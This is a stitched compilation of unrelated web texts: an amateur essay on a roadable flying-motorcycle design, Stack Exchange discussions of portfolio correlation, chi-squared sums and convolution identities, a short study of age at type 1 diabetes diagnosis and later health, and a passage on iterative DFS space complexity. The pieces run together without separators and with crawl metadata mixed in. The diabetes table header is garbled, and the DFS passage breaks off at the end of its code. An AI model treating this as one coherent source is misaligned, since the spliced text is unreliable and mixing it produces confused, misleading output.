I have had an interest in refining a design for a roadable aircraft for some years. Here is an essay on that possibility... as a three wheeled flying motorcycle. May I say that I have been following this particular subject for some time. After many years of design work, I shall say that the only things required for the advance of roadable aircraft are a "reasonable" approach by government, both state and federal, in regard to experimental aircraft. One of the first approaches to an affordable roadable aircraft will be a flying motorcycle. The reason for this is that once you call something a "car", you open a can of worms with regard to regulation. My design offers a reasonable and practical workaround: the three wheeled motorcycle. It will be a two passenger, tandem seating (one front, one back) section of fuselage similar to a sailplane, with a bubble top canopy, and having TWO WHEELS IN FRONT and a single rear drive wheel. This is a stable road configuration, as opposed to the single front wheel, which can easily roll over in a turn, especially a braking turn. That fact considered, shall we look at the flying configuration. This part is a well known and applauded design by Burt Rutan called the "Long-EZ".
This has been flying for well over 20 years and is a superb flying platform: stable, efficient, stall resistant, and having an excellent glide ratio, being one of the more slippery designs out there. Just go to Oshkosh for the fly-in, and you will see these aircraft in surprising numbers, and they are all hand built. One of the interesting things about the design is that the main wing spar, which carries 90% of the load, is located behind the rear seat. This most interesting feature allows for the convenient sectioning of the forward fuselage from the main wing/landing gear/engine/propeller/fuel tanks section, which I shall call the "flying package". This also includes the forward wing, known as the "canard" wing, which is removed and stays with the flying package. Don't be afraid. Sailplanes take the wing off each day with a couple of secured bolts. Part of a good design. The landing gear remains fixed, for economy and simplicity, although there are many examples of canard aircraft with the luxury of retractable gear. You can gain another 20 knots or so. But... you're going to PAY!!! The forward landing gear is a single retractable nose wheel, light and simple, which retracts with a hand lever. The "road wheels" do "road work". This is important in design considerations. Aircraft wheels are light, thin, and have no tread, and work marvelously as aircraft wheels. They are not welcome on the street or highway and do not last in that purpose. They are thin. Simple. Do not use aircraft tires on the road. This design has two motorcycle wheels with disc brakes which may be coupled to or released from an internal torsion bar suspension, saving weight and drag, and locating some suspension weight further aft, a good thing. The covers come off; the wheels come down and get pre-loaded to bear the vehicle weight. Then the wheel covers are re-secured in reverse to become fenders. The nose wheel is now retracted, and the gear door locked closed.
When on the parking tarmac, we secure the wing in its tie-down configuration and then deploy a rear support strut, just under the engine support. This will bear much of the weight (nearly as much as the road vehicle) and keep the flying package from tilting over backwards and pranging an expensive propeller. I should perhaps mention that we don't ever want to go down the street with expensive and delicate aircraft parts and compete with trucks, SUVs and $50 cars with bad drivers. My design leaves all of this at the airport, and it is through this rational approach that we will again have need of, and praise, our local airport. You will never have a situation where you land on highways and streets. This is nonsense and shall never be accepted by the majority. I am not opposed to emergency utilization of highways for landing and... there are ways to do this safely. Ask me later.
Now, as to the road vehicle. As the aircraft sits at tie-down, with the support strut in place, we can deploy the front suspension. This is a Sikorsky design (circa 1930) and well proven, as anyone who has seen a Catalina flying boat or an F8 Crusader can attest. The fuselage covers for the wheels are removed and the wheels come out, and with the aid of a small speed wrench (a crank)
the weight of the road assembly is received... a "pre-loading" of the suspension. The covers that come off are then secured back onto the body and serve as fenders (it pleases the DOT to have fenders, and they sort of protect the canopy). Clever design.
Next, the rear drive wheel is deployed by the speed wrench, allowing it to touch ground and pre-load the weight of the road vehicle. It utilizes a shaft drive. Now, we can release the electrical (multi-pin Amphenol connector) and flex tubing for the Pitot tube (air speed indicator, you see). The mechanical connections for flaps, elevons, rudders, brakes, throttle, mixture control etc. are touch-based mechanical designs, thought out long ago by such visionaries as Molt Taylor. Each comprises a pad, like a hockey puck, which lines up with another like it. They push against each other. Right aileron against left aileron,
rudder against rudder, throttle bellcrank, mixture control etc.
It's not rocket science, folks. A high school kid can do it. This would all be possible in about ten minutes or less, perhaps taking more time for re-assembly at pre-flight. Still with me? Now, we can remove the four bolts and securing pins, and separate the road vehicle. The road vehicle is powered by a separate engine. After all, aircraft engines are somewhat expensive, and you only get 2000 hrs before major overhaul; although there are some extraordinary designs for automotive engines with forged crankshafts, different cams, and of course a cog-belt reduction gear to reduce propeller RPM from that of the V-8... usually from
4100 rpm down to 2150, where the propeller is most efficient. This has been done, and is done every day. They even have a 3 litre Subaru flying.
The point is that it is foolhardy to waste the flying hours that you get out of a 25,000 dollar aircraft engine on road travel, when we can get an inexpensive 2-cycle motorcycle engine to do the job much better, with popular parts available anywhere, and other advantages. And fewer emissions.
The canard wing (as mentioned before) is removed with two bolts and securing pins, and is secured to the wing. All of the expensive stuff stays at the flying field. Simple. Don't expose your aircraft to the street.
The road vehicle is simple, light enough and, if necessary, replaceable.
The fuselage, in fact, has been proven to enjoy a better than 30 MPH crash rating. Substantially better than a bare motorcycle, in which YOU are
"the roll cage". In performance, I should be satisfied with a road speed of 60 MPH, and reasonable braking performance.
The aircraft is flown with a side-arm stick, which doesn't interfere at all with the steering wheel. The brake pedal is above the rudder pedal on the right, and the clutch is above the left. And if you can't drive stick, you have no business flying. Now... is this for everyone? Well, certainly not for those with a reckless driving record. The privilege of flying any aircraft remains with those who prove themselves competent to earn an aviation licence, and justly so. What has kept the general public from embracing general aviation until now has been the extraordinary costs (defrayed by home building),
the difficulties of navigation (now demystified by the advantages and miniaturization of GPS navigation, and glass cockpit displays enabling you to land in the fog anywhere... it's already here),
the required talent in sculpting a laminar air-flow wing from polyfoam, S-glass, epoxy resin and graphite fibre (this can be satisfied by a manufacturer with an autoclave, a heated mold which produces a perfect wing
in hours, not months... perfect!),
and the will and confidence to fly. This has been satisfied under your nose by a generation of kids who can fly a helicopter on their computer screen at the age of twelve. Yes... things have changed... a little bit. In fact, you can learn to fly on your computer. It's done all the time. You still need to go to school
with a certified flight instructor. But it will be worthwhile. Having your transportation with you at all times is an idea whose time has come.
What do we need??????
Federal and state co-operation.
And perhaps, a sort of race. Really.. a competition.
All forms of racing have reached the envelope. Formula One, NASCAR, NHRA
drags, USSC, unlimited air racing... you name them. They are all "aberrations of transportation" and presently do little for the advancement of our own transportation. But let's consider:
A race between point A and point B on the road with two people on board and a modest payload... say a bag of golf clubs and an overnight case for each person. Extra grand prix points for payload. Upon reaching point B, the vehicle
prepares for flight. No speed required here. Half an hour should be reasonable.
No pit crew allowed or required. Then, a tech inspection... half an hour.
Then, pre-flight and on to point C; for instance, Barnstable, Cape Cod to
Nantucket; land, re-set as a road vehicle, go to town and get a tee shirt and a hamburger, return, reconfigure for flight, fly to Provincetown, fuel up, stretch your legs and return to Barnstable. Now, THERE is a competition I should like to see on ESPN!!! After 5 years of competition, we shall have isolated a design worthy of production as a kit, so as to make the idea affordable and possible. A kit could be made for under 15,000 dollars, and then powered howsoever you can afford. As of today, our GA fleet is getting so long in the tooth that we are on the point of replacing half of them anyway, and we haven't even mentioned the corrosion problems associated with aluminum-skinned aircraft. By the way: fibreglass and epoxy aircraft don't rust. More importantly, you are the manufacturer, and the responsible party.
This has been the hallmark of the EAA for many years. They have a good record for quality, high performance aircraft, and as a community, serve themselves well in all respects.
As to the performance specifications we may see with this design, typical performance characteristics for such aircraft are:
Take-off velocity ---- 60 kts
Landing velocity ---- 55 kts
Cruise velocity ---- 160 kts and better
Top velocity ---- 190 kts and better
Range ---- 800 NM and better (just how long do you want to sit in one place anyway?)
Glide ratio ---- 10 to 1 and better, which means that, unlike some of the hare-brained ideas lately, this aircraft, in an engine-out situation, can linger in the air a damned sight longer than most anything else out there, and for me that is a keen consideration in anything I should fly. I dislike copters... too many disposable parts. ANY AIRCRAFT WHICH LOSES POWER SHOULD STILL FLY AND CONTINUE TO FLY. This is very important. If I am at 5000 feet, I
should expect to glide for 10 miles anyway.
Also, with the advantages of an onboard nav computer with an excellent database, you can hit a function key, and the computer will tell you where to steer and make a best decision on where to put down in an emergency.
Some comfort there. There also exists a ballistic recovery parachute which will safely bring you down at the push of a button. REALITY, not SF.
Well, thank you for your patience and persistence in reading my essay.
https://quant.stackexchange.com/questions/33656/what-is-the-total-correlation-between-assets-in-a-portfolio/33660 | # What is the total correlation between assets in a portfolio?
Suppose I have portfolio with 10 assets, each one of them with a weight of 10% from the total portfolio (equally weighted).
It's well known how to measure from historical prices->returns a variance-co-variance matrix. And from here to have portfolio's Variance and STD (and later on this is useful for VaR calculation etc.)
However it's also useful to know the regular correlation (Pearson correlation coefficient) between each pair of assets.
The question is: What is the correct measure to some kind of "Total" or "Average" correlation between all the assets in a portfolio?
Naively because it's equally weighted portfolio I just took simple arithmetic average of all pairwise correlation coefficients...
This is indeed an interesting question.
According to this website, a paper by Goldman Sachs [Tierens and Anadu (2004)] proposes three alternative methods for estimating average stock correlations:
1. Calculate a full correlation matrix, weighting its elements in line with the weight of the corresponding stocks in the portfolio/index, and excluding correlations between the stock and itself (i.e. the diagonal elements of the correlation matrix)
2. Proxy average correlation using only individual stock volatilities and that of the portfolio/index as a whole
3. Refine 2. by reference to the ratio of index to average stock volatility
You can find more details on the abovementioned website. Unfortunately I haven't found the original paper, but if somebody provides a link in the comments I will update the post.
So to answer your question about a "correct" method: as always, there is no "god-given" way to model statistical phenomena; there are always tradeoffs, with certain characteristics that are helpful in some situations but less so in others. Some important characteristics and tradeoffs for the different methods can be found in section 3 (Comments) of the abovementioned website.
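Method 1 above (weighting the off-diagonal correlations by the products of the corresponding portfolio weights) can be sketched in a few lines of plain Python; for an equally weighted portfolio it reduces to the simple average the questioner used. The data below are toy numbers, purely for illustration:

```python
def avg_correlation(corr, w):
    """Weighted average pairwise correlation (method 1):
    sum_{i != j} w_i * w_j * rho_ij  /  sum_{i != j} w_i * w_j,
    excluding the diagonal terms rho_ii = 1."""
    num = den = 0.0
    n = len(w)
    for i in range(n):
        for j in range(n):
            if i != j:
                num += w[i] * w[j] * corr[i][j]
                den += w[i] * w[j]
    return num / den

# Toy 3-asset example, equally weighted:
corr = [[1.0, 0.2, 0.4],
        [0.2, 1.0, 0.6],
        [0.4, 0.6, 1.0]]
w = [1 / 3, 1 / 3, 1 / 3]
print(avg_correlation(corr, w))  # 0.4, the simple mean of 0.2, 0.4, 0.6
```

With unequal weights, pairs of large positions dominate the average, which is the point of the weighting in method 1.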
I just want to add to vonjd's answer some info on the comparison of the 3 methods. This is too big for a comment so I'm posting as a separate answer but please upvote his answer, not mine.
# Do the differences in methodologies matter in practice?
To gauge the practical importance of the biases in methods 2 and 3, we calculate the weighted stock correlation for the stocks in the S&P 500 index during the period January 2002 through March 2004. For each month in our sample, we use the daily total returns of each of the S&P 500 constituents to calculate the pair-wise correlations needed in method 1, and the single stock volatilities needed in methods 2 and 3. In addition, we calculate the volatility of the S&P 500 index based on its daily total returns during the month, and we use the start-of-month index weights to obtain the weighted average stock correlation.
Exhibit 2A shows the resulting weighted average cross-stock correlations for each of the 27 months in the sample based on each of the three calculation methods. The choice of method has a modest impact on the average correlation number for a well-diversified portfolio or index such as the S&P 500. Exhibit 2B makes this point even clearer by plotting the differences between the correlation numbers obtained from each of the methods. The absolute difference in correlation fell below 0.05 during the past 2+ years. Exhibit 2B also visualizes the consistent upward bias in method 3 as compared to method 2, but the overestimation is less than 0.01 in absolute value.
Exhibits 3A and 3B analyze the difference between methods 1 and 2 further, by looking at some crude measures associated with the volatility bias in method 2 identified above. They suggest that larger differences tend to happen more often in periods when average stock volatility is higher or when stock volatility has changed by a larger amount.
• Thank you, do you have a source? If this is the original paper do you have a link? – vonjd Apr 13 '17 at 6:01
• This is from that GS paper, but it's not available publicly. With your answer and this addition, that pretty much covers everything that's in that report. – msitt Apr 13 '17 at 6:04
• Ok, I found it in the GS database, thank you again. – vonjd Apr 13 '17 at 6:12
• Do you think the formula for $\rho_{avg(3)}$ is right? it looks more like a $\rho^2$ (always positive) than a $\rho$. What does the original paper say? – noob2 Apr 13 '17 at 11:24
• @noob2: Just checked it, the formula is the same. – vonjd Apr 13 '17 at 13:00
https://math.stackexchange.com/questions/1096298/question-about-sum-of-chi-squared-distribution | # Question about sum of chi-squared distribution
I want to prove that the sum of two independent chi-squared random variables is a chi-squared random variable.
I am supposed to only use the fact that if $Q$ has a chi-squared distribution with parameter k then Q = $Z_1^2$ + $Z_2^2$ + ... + $Z_k^2$ where each $Z_i$ is a standard normally distributed random variable and {$Z_1$,...,$Z_k$} is independent.
My attempt at a proof:
Let $Q_1$ and $Q_2$ be independent random variables with chi-squared distributions, with parameters a and b, respectively. Let {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$} be a set of independent random variables with standard normal distributions. Then we can write
$Q_1$ = $X_1^2$ + $X_2^2$ + ... + $X_a^2$
$Q_2$ = $Y_1^2$ + $Y_2^2$ + ... + $Y_b^2$ , and $Q_1$ and $Q_2$ are independent because {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$} is independent.
so $Q_1$ + $Q_2$ = $X_1^2$ + $X_2^2$ + ... + $X_a^2$ + $Y_1^2$ + $Y_2^2$ + ... + $Y_b^2$.
Since {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$} is independent, $Q_1$ + $Q_2$ is a chi-squared random variable with parameter a+b.
I don't think my proof is correct. I think the problem is that if we are given $Q_1$ and $Q_2$ that are independent, we can't just write them in terms of {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$}. But I am not really sure. Please tell me why my proof is incorrect (or maybe it is correct). Any help is appreciated.
• In my view your proof is correct (and nice too). If you are still suspicious then you could use the characteristic functions of the distributions. – drhab Jan 8 '15 at 11:16
• "We can't just write them in terms of..." Yes, we can! And in many cases we should, since this practice is very fruitful. Just as a binomial can be written as finite sum of Bernouillis. Very handsome e.g. if expectations must be calculated. – drhab Jan 8 '15 at 11:39
• I guess what I am a bit confused about is: we know that Q1 can be written as a sum of the squares of independent standard normal variables {A1,A2,...,Am} and Q2 can be written as a sum of the squares of independent standard normal variables {B1,B2,...,Bn} (I am not confused about this), but how can we be sure that {A1,...,Am,B1,...,Bn} is independent? – Noppawee Apichonpongpan Jan 8 '15 at 11:47
• See my answer with an accent on start. We are sure of the independence of the $A_i$ and $B_j$ because we preassume them to be independent. – drhab Jan 8 '15 at 12:49
You can just start with independent standard normal variables $\{A_1,\dots,A_m,B_1,\dots,B_n\}$ and define: $$Q_1=A_1^2+\cdots+A_m^2$$ $$Q_2=B_1^2+\cdots+B_n^2$$ $$Q=A_1^2+\cdots+A_m^2+B_1^2+\cdots+B_n^2$$ Then $Q_1$ and $Q_2$ are independent and both have chi-squared distribution with parameters $m$ and $n$ respectively.
Also it is clear that $Q_1+Q_2=Q$ and that $Q$ has chi-squared distribution with parameter $m+n$.
This proves that a sum of two independent rv's with chi-squared distributions also has a chi-squared distribution, with parameter equal to the sum of the parameters of its terms.
What follows can be left out and must be seen as an effort to make your understanding complete:
If $Q_1'$ and $Q_2'$ are independent chi-squared distributions with parameters $m$ and $n$ respectively that 'show up somewhere' then:
• $Q_1'$ and $Q_1$ have the same distribution.
• $Q_2'$ and $Q_2$ have the same distribution.
• $Q':=Q_1'+Q_2'$ and $Q=Q_1+Q_2$ have the same distribution.
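Following up on the earlier comment about characteristic functions: the result can also be sanity-checked numerically. A quick Monte Carlo sketch (purely illustrative), verifying that $Q_1+Q_2$ has the mean $m+n$ and variance $2(m+n)$ of a chi-squared variable with parameter $m+n$:

```python
import random

def chi2_sample(k, rng):
    """One draw from chi-squared(k): the sum of k squared standard normals."""
    return sum(rng.gauss(0, 1) ** 2 for _ in range(k))

rng = random.Random(0)
m, n, trials = 3, 5, 20000
sums = [chi2_sample(m, rng) + chi2_sample(n, rng) for _ in range(trials)]

# chi-squared(m + n) has mean m + n and variance 2 * (m + n).
mean = sum(sums) / trials
var = sum((s - mean) ** 2 for s in sums) / trials
print(round(mean, 2), round(var, 2))  # should land near 8 and 16
```

Matching the first two moments is of course only a heuristic check, not a proof; the proof above (or characteristic functions) settles the distributional claim.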
• I think this is correct. Thank you very much for explaining it to me so clearly! – Noppawee Apichonpongpan Jan 8 '15 at 13:18
• You are very welcome. – drhab Jan 8 '15 at 14:10 | 2018-12-12 04:42:50 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8061971664428711, "perplexity": 134.61144821263795}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376823738.9/warc/CC-MAIN-20181212044022-20181212065522-00387.warc.gz"} |
https://math.stackexchange.com/questions/389061/verifying-convolution-identities | # Verifying Convolution Identities
Note: I don't yet have a solution to my main issue yet which I have elaborated on in the edit. Further attention is deeply appreciated. :>
$\bf{\text{Original Question}}$:
Let $G$ be a locally compact group, $\mu$ a Haar measure for $G$ and $f,g\in L^{1}(G)$.
Then by definition $(f*g)(x) = \int_{G}f(y)g(y^{-1}x)\mu(dy)$.
The author remarks in the book I am reading that we also have the following identities:
\begin{eqnarray*} (f*g)(x) &=& \int_{G}f(xy)g(y^{-1})\mu(dy)\\ &=& \int_{G}\delta(y^{-1})f(y^{-1})g(yx)\mu(dy)\\ &=& \int_{G}\delta(y^{-1})f(xy^{-1})g(y)\mu(dy) \end{eqnarray*}
where $\delta:G\to(0,\infty)$ is the unique modular function such that $\delta(x)\mu(B) = \mu(Bx)$ for all Borel sets $B$ and $x\in G$.
I cannot seem to verify any of them. Can anyone help me get started on this? The smallest suggestion possible is best.
I was trying to use the property that $\int_{G}f(xy)\mu(dy) = \int_{G}f(y)\mu(x\cdot dy)$ but I couldn't get anywhere. Any suggestions on what the correct trick is?
$\bf{\text{Edit }}\text{(Far more basic question)}:$
I get very confused with some of the measure theory notation, so I've been trying to neurotically stick to one convention so as not to be confused.
For a $\mu$-integrable $f$, I've been writing $$\int_{G}fd\mu = \int_{G}f(x)\mu(dx)$$ to mean that $x$ is my variable of integration.
Then based on this convention, if we define $\lambda(E) = \mu(yE)$, then I've been writing
$$\int_{G}fd\lambda = \int_{G}f(x)\lambda(dx) = \int_{G}f(x)\mu(y\cdot dx)$$
Is this the quantity you are referring to when you write $\int_{G}f(x)d(yx)$?
If so, am I correct to perform the following calculation (returning to the case where $\mu$ is a Haar measure)?
$\begin{eqnarray*} \int_{G}fd\mu &=& \int_{G}f(x)\mu(dx)\\ &=& \int_{G}f(x)\mu(y\cdot dx)\\ &=& \int_{G}f(y^{-1}yx)\mu(y\cdot dx)\\ &=& \int_{G}f(y^{-1}x)\mu(dx)\\ &=& \int_{G}f(y^{-1}\cdot)d\mu \end{eqnarray*}$
Please be mercilessly honest if anything is even slightly incorrect. I've had a "vague" understanding of these technicalities for far too long and I want to finally really nail them down.
To get all of these properties, use the defining property of the Haar measure: It is left-invariant under the action of $G$. In other words, $\int f(x)dx=\int f(x) d(yx)$ for any $y\in G$. Once you have this, you can change the measure in that fashion without affecting the value of the integral, and then change variables to get your old measure back: for instance, in my previous example, replace $x$ with $y^{-1}x,$ so you get $\int f(x) d(yx)=\int f(y^{-1}x) d(yy^{-1}x)=\int f(y^{-1}x)dx.$ [By the way, I'm suppressing the $\mu$ in my notation to make things look cleaner.]
Thus, we can get the first equality you ask about by replacing $y$ with $xy,$ so we get \begin{align*}(f * g)(x)&=\int_G f(y)g(y^{-1}x)dy\\&=\int_Gf(xy)g((xy)^{-1}x)d(xy)\\&=\int_Gf(xy)g(y^{-1})d(xy)\\&=\int_G f(xy) g(y^{-1})dy,\end{align*} where the final equality comes from the left-invariance of Haar measure.
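The identities involving $\delta$ need one extra ingredient beyond left-invariance: the inversion formula relating Haar measure to the modular function. A sketch for the second displayed identity, taking that formula as given (it is the standard relation, stated here without proof):

```latex
% Inversion formula for the modular function:
\int_G h(y)\,\mu(dy) \;=\; \int_G \delta(y^{-1})\,h(y^{-1})\,\mu(dy).

% Apply it with h(y) = f(y)\,g(y^{-1}x):
(f*g)(x) \;=\; \int_G f(y)\,g(y^{-1}x)\,\mu(dy)
        \;=\; \int_G \delta(y^{-1})\,f(y^{-1})\,g(yx)\,\mu(dy).
```

The same substitution applied to the other displayed forms produces the remaining $\delta$-weighted identity.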
https://diabetesjournals.org/care/article/30/11/2859/4823/Does-Age-at-Diabetes-Diagnosis-Influence-Long-Term | Type 1 diabetes is a complex chronic illness. Because self-care is such an essential element of successful diabetes management, cognitive and behavioral aspects of childhood development may interfere with effective self-care behaviors and impact the probability of later complications. The objective of this study was to examine whether the age at diagnosis of diabetes is significantly related to physical and behavioral outcomes in adulthood. It may be that children diagnosed in adolescence spend their first few years with diabetes rebelling against the therapeutic demands of treatment. An intense phase of inadequate care could lead to health consequences later in life; behaviors adopted in adolescence could also linger long into adulthood. Conversely, it is possible that being diagnosed very early in life leads to a dependence on others that affects health and behavior long into the future.
This study used the patient survey data collected as part of the Translating Research into Action for Diabetes (TRIAD) study, which has been previously described (1). All patients with diabetes who participated in the TRIAD study, had baseline patient survey and chart review data for the period between July 2000 and October 2001, and reported being diagnosed with diabetes at or before 21 years of age were selected for inclusion in this study. The CASRO response rate was 69% (2).
We extracted information about health and social outcomes. Health outcomes included reported weight, BMI, prevalence of heart attack and stroke, and self-reported general health. We also assessed physical health status using the 12-item Short-Form Health Survey physical component score (3). Social outcomes included levels of income and education and smoking behavior. Demographic data were gathered for each patient, including age at time of interview, number of years since diagnosis, race, and sex. The main predictor was self-reported age at diagnosis of diabetes.
To adjust for potential confounding in analyses of continuous outcome variables, we used multiple regression. Covariates included in all models were sex, race/ethnicity, and duration of diabetes. Although age is a continuous variable, we divided age at diabetes onset into three categories (0–9, 10–13, and 14–21 years) to more adequately reflect our hypothesis and to be consistent with prior studies that performed similar analyses (4–6). For linear regression models, we estimated the β-coefficient (slope) and its 95% CI for age at diabetes onset. For logistic regression models, we estimated the odds ratio (OR) and its 95% CI for age at diabetes onset. Statistical significance was defined at the 0.05 level (two-sided).
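For the logistic models, the OR and its 95% CI come from exponentiating the fitted coefficient and its Wald interval. A minimal sketch; the coefficient and standard error below are made-up illustrative values, not taken from the study:

```python
import math

def odds_ratio_ci(beta, se, z=1.959964):
    """Odds ratio and two-sided 95% CI obtained by exponentiating a
    logistic-regression coefficient and its Wald interval."""
    return math.exp(beta), math.exp(beta - z * se), math.exp(beta + z * se)

# Hypothetical coefficient and standard error, not taken from the paper:
or_, lo, hi = odds_ratio_ci(-0.8, 0.27)
# or_ is about 0.45; a CI that excludes 1 is equivalent to two-sided
# significance at the 0.05 level
```

This equivalence (CI excluding 1 versus p < 0.05) is how the ORs in Table 1 are read.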
A total of 590 participants met inclusion criteria for this study. Over one-half of participants were female (59.8%), and 43.4% were nonwhite. Almost one-half (48.6%) were diagnosed with diabetes at 14–21 years of age, with the remainder diagnosed at 0–9 years of age (29.5%) and 10–13 years of age (21.9%). Mean current age at the time of the TRIAD study did not differ significantly across the three diabetes age-at-onset categories. As a consequence, mean duration of diabetes was longest for individuals diagnosed between 0 and 9 years of age (32.7 years) and shortest for those diagnosed between 14 and 21 years of age (24.6 years). There were no differences in reported treatment across the age-at-diagnosis groups.
### Adjusted associations between age at onset and later health outcomes
After adjusting for personal characteristics and duration of disease, individuals diagnosed between 14 and 21 years of age were significantly heavier (BMI 1.99 kg/m2 [95% CI 0.46–3.52]) than those diagnosed between 10 and 13 years of age. Those diagnosed between 0 and 9 years of age were significantly less likely to have had a heart attack (OR 0.48 [95% CI 0.23–0.97]) than those diagnosed between 10 and 13 years of age. In adjusted models, there were no statistically significant associations between age at onset and stroke or quality of life. Interestingly, patients diagnosed between 14 and 21 years of age were significantly less likely to have smoked in the last year (0.45 [0.27–0.74]) than those diagnosed between 10 and 13 years of age (Table 1). Those diagnosed between 0 and 9 years of age may have had this same relationship, but it was not statistically significant (0.73 [0.42–1.25]). Although the relationships between the age at diagnosis and other social outcomes (i.e., household income and education attainment) trended toward the results seen in the unadjusted data, none were statistically significant.
Our analyses show that the timing of childhood diabetes diagnosis is significantly associated with important health-related factors later in life. After adjusting for duration of disease, children diagnosed between 10 and 13 years of age were significantly more likely to have had a heart attack than those diagnosed between 0 and 9 years of age. We also found that children diagnosed between 10 and 13 years of age were more likely to have adopted a risky behavior (e.g., smoking that continues in adulthood) than those diagnosed between 14 and 21 years of age.
There are several limitations to this study. Our sample size was relatively small and may have lacked statistical power to detect meaningful differences in some of the main outcome variables. Our study was also cross-sectional and included analyses of several outcomes that depended on recall of events. In addition, although participants across the three study groups were diagnosed with diabetes as either children or adolescents, an average of ∼30 years ago, it is possible that some had type 2 diabetes. This seems unlikely, however, given that a diagnosis of type 2 diabetes was extremely rare during the era in which the diagnosis was made. We made every effort to identify those who might have type 2 diabetes and conducted sensitivity analyses. Our analysis was also limited by the fact that it is impossible to control for both diabetes duration and current age in a regression setting, due to the dependencies among age at onset, diabetes duration, and current age.
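The identifiability problem mentioned last is the exact linear identity current age = age at onset + duration (up to within-year rounding), so any two of the three variables determine the third and all three cannot enter one regression. With illustrative numbers:

```python
# current age = age at onset + diabetes duration (up to within-year
# rounding), so the three variables are perfectly collinear and cannot
# all be controlled for in one regression; numbers below are illustrative
rows = [(8, 30, 38), (12, 27, 39), (16, 25, 41)]  # (onset, duration, age)
assert all(onset + duration == age for onset, duration, age in rows)
```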
Diabetes is a difficult disease to manage under ideal conditions. The unique demands of adolescent development, particularly the separation from parental norms and the development of a self-identity, can clearly conflict with the demands of diabetes treatment. Our data suggest that age at diagnosis may be an important factor in long-term outcomes associated with the disease.
Table 1—Adjusted associations between age at diagnosis and current social and behavioral outcomes*

| Outcome | 0–9 years old | 14–21 years old |
| --- | --- | --- |
| Education (high school or more) | 0.91 (0.44–1.89) | 0.86 (0.42–1.74) |
| Annual income over $40k | 0.83 (0.50–1.38) | 1.02 (0.64–1.64) |
| Smoked cigarettes in last year | 0.73 (0.42–1.25) | 0.45 (0.27–0.74) |

Data are OR (95% CI).

*All results are comparisons with adolescent age at onset (10–13 years old). Adjusted ORs include 95% CIs, as determined using logistic regression models. All models adjusted for sex, race, and duration of diabetes in years.
This research was funded by grants from the National Institutes of Health (1 K23 DK067879-01 to A.E.C.) and by Program Announcement no. 04005 from the Centers for Disease Control and Prevention (Division of Diabetes Translation) and the National Institute of Diabetes and Digestive and Kidney Diseases as part of the TRIAD study.
1. The Translating Research Into Action for Diabetes (TRIAD) study: a multicenter study of diabetes in managed care. Diabetes Care 25:386–389, 2002
2. Frankel L: The report of the CASRO Task Force on response rates. In Improving Data Quality in a Sample Survey. Wiseman R, Ed. Cambridge, MA, Marketing Science Institute, 1983, p. 1–11
3. Ware J Jr, Kosinski M, Keller SD: A 12-item short-form health survey: construction of scales and preliminary tests of reliability and validity. Med Care 34:220–233, 1996
4. Kaufman FR, Epport K, Engilman R, Halvorson M: Neurocognitive functioning in children diagnosed with diabetes before age 10 years. J Diabetes Complications 13:31–38, 1999
5. Krolewski AS, Warram JH, Rand LI, Christlieb AR, Busick EJ, Kahn CR: Risk of proliferative diabetic retinopathy in juvenile-onset type 1 diabetes: a 40-yr follow-up study. Diabetes Care 9:443–452, 1986
6. Ryan CM, Morrow LA: Self-esteem in diabetic adolescents: relationship between age at onset and gender. J Consult Clin Psychol 54:730–731, 1986
Published ahead of print at http://care.diabetesjournals.org on 6 August 2007. DOI: 10.2337/dc07-0563.
A table elsewhere in this issue shows conventional and Système International (SI) units and conversion factors for many substances.
The costs of publication of this article were defrayed in part by the payment of page charges. This article must therefore be hereby marked “advertisement” in accordance with 18 U.S.C Section 1734 solely to indicate this fact.
https://polskanawozku.pl/jo-l-veefdd/iterative-dfs-space-complexity-14bc78 | ### Iterative DFS Space Complexity
DFS vs. BFS, and the iterative DFS approach.

I'm referring to a question already asked on Stack Overflow: https://stackoverflow.com/questions/25988965/does-depth-first-search-create-redundancy. However, I'm not quite convinced by the answers provided there.

Depth-first search (DFS) is the most fundamental algorithm for exploring the nodes and edges of a graph; it runs in O(|V| + |E|) time. In the iterative form, we use a manual stack to simulate the recursion. Some iterative DFS implementations that I have seen (such as the one provided by Wikipedia) allow vertices to be pushed onto the stack more than once: every edge into a vertex can contribute a copy of it, and the visited check happens only when an entry is popped. The space complexity would thus be Θ(|E|) in the worst case; note that |E| itself may vary between O(1) and O(n²), depending on how dense the graph is. A recursive implementation of DFS, by contrast, requires at most Θ(|V|) space, since it stores only the path from the root to the current node plus the unexplored successors along that path (this is also why DFS space is often quoted as O(bm), with branching factor b and maximum search depth m). Why would one want to allow multiple occurrences of the same vertex on the stack?

As a concrete example, apply the duplicate-pushing algorithm to a graph in which the start node 1 leads to node 2, node 2's children are node 0 and node 3, node 3's expansion pushes node 0 and node 4 onto the stack, and so on. Each expansion pushes another copy of node 0, and this continues until the stack is filled with 100 occurrences of node 0 before the first of them is popped and marked visited.
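For concreteness, here is a sketch of the duplicate-pushing implementation, run on a hypothetical graph in the spirit of the example above: a chain of 100 vertices that all point back at node 0.

```python
def dfs_duplicates(graph, start):
    """Iterative DFS in the duplicate-pushing style: neighbours are pushed
    unconditionally, and 'visited' is checked only when an entry is popped.
    Returns the visit order and the peak stack size."""
    visited, order, peak = set(), [], 0
    stack = [start]
    while stack:
        peak = max(peak, len(stack))
        v = stack.pop()
        if v in visited:
            continue
        visited.add(v)
        order.append(v)
        stack.extend(graph[v])
    return order, peak

# Hypothetical graph: vertices 1..99 each point at node 0 and at the next
# vertex, vertex 100 points at node 0, and node 0 has no outgoing edges.
graph = {0: [], 100: [0]}
graph.update({i: [0, i + 1] for i in range(1, 100)})

order, peak = dfs_duplicates(graph, 1)
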